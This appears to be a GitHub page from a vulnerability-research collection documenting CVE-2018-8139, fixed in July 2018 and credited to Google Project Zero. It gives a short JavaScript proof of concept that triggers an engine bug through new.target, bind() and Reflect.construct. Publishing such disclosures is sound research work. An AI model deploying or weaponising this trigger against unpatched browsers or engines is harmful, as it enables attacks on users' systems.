Skip to content

Latest commit

 

History

History
22 lines (15 loc) · 500 Bytes

CVE-2018-8139.md

File metadata and controls

22 lines (15 loc) · 500 Bytes

CVE-2018-8139

  • Fix: July 2018
  • Credit: lokihardt of Google Project Zero

PoC

function func() {
    new.target.x;
}

let bound = func.bind({}, 1);

Reflect.construct(bound, []);

Reference